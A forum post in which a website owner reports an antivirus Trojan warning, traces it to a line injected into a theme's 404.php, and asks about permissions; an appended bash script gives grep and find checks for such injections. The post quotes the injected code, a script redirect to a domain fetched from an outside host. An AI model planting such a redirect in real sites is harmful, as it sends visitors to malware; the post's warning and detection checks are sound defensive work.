Hello people.
I am writing this in order to:
1) warn other people.
2) help people who might have gotten this hack
3) get more tips from more knowledgeable people than me :)
I entered into one of my sites today and my AVAST antivirus warned me against a Trojan Horse (JS:ScriptIP-inf [Trj])
That was located inside my theme image files, two of them:
1) images/ico-catlist.gif\{gzip}
2) images/ico-arrow.gif\{gzip}
I searched for them in the source code of the site but couldn't find them.
I then went to the server and didn't see any changes in those files.
I then looked for any changes made to any of the files on the site.
I found that the 404.php file was changed today.
After opening it I found it had the following code added to the beginning of it (just before the "<?php get_header(); ?>" ) :
<script>location='http://scan.<?php echo file_get_contents('http:// borntobebest . biz/actual_domain.txt'); ?>/vista1/6/48017/';</script>
(I added spaces in the URL, just to be on the safe side)
I erased the extra line and the site stopped giving Trojan warnings.
Here are my questions:
1) My theme directory was CHMOD 775, I changed it to 555 - will this help in the future?
2) Why did my homepage suffer from a code injection in the 404.php? Isn't the 404.php file activated only when the page is not found?
Any thoughts will be warmly welcomed.
Tal
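
The checks the post walks through (find the injected redirect, list theme files changed today, look at the theme's write permissions), as an added example that is not part of the original post. The function names are made up for illustration, and the two grep patterns are assumptions modelled on the injected 404.php line; they will not catch obfuscated variants.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. Function names are hypothetical.

# Print PHP files under $1 that either fetch a remote URL with
# file_get_contents() or assign location= straight from a <script> tag,
# the two traits of the line found at the top of 404.php.
scan_injected() {
    local dir=$1
    grep -rlE --include='*.php' \
        -e "file_get_contents[[:space:]]*\([[:space:]]*['\"]https?://" \
        -e "<script[^>]*>[[:space:]]*(window\.|document\.)?location[[:space:]]*=" \
        "$dir" 2>/dev/null | sort
}

# Print PHP files under $1 modified within the last $2 days (default 1),
# the "what changed today" check that led to 404.php.
recently_changed() {
    local dir=$1 days=${2:-1}
    find "$dir" -type f -name '*.php' -mtime "-$days" -print | sort
}

# Print anything under $1 that is writable by group or other.
# A 775 directory shows up here; a 555 or 755 one does not.
loosely_writable() {
    find "$1" \( -perm -020 -o -perm -002 \) -print | sort
}

# Usage (path is a placeholder):
#   scan_injected    /path/to/wp-content/themes/mytheme
#   recently_changed /path/to/wp-content/themes/mytheme 1
#   loosely_writable /path/to/wp-content/themes/mytheme
```

A hit from scan_injected is a lead to read by hand, since legitimate themes and plugins also call remote URLs.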